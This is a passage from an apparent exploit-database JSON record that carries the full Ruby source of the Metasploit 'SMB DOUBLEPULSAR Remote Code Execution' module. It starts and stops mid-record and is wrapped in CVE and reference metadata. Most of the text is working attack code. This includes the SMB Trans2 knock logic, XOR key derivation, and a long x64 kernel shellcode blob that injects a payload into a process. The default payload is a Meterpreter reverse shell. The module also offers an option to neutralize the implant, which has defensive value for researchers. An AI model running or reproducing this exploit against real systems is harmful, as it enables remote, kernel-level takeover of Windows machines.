\"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n 
\"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2020-02-04] #"}, "lastseen": "2020-02-05T00:47:44", "differentElements": ["cvss2", "cvss3", "reporter", "sourceData", "title"], "edition": 1}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "a29471c4b5bc1cd538a51cd3a4b54098", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit\n", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", 
"userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-01T13:26:14", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:42031"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, 
{"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", 
"MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2020-02-05T00:47:44", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2020-02-05T00:47:44", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob 
Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n 
not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An 
unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n 
def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n 
pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n 
\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n 
\"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n 
\"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-01] #"}, "lastseen": "2021-09-01T13:26:14", "differentElements": ["title"], "edition": 2}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "14a588c63a2209707b7e878a25fbd043", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": 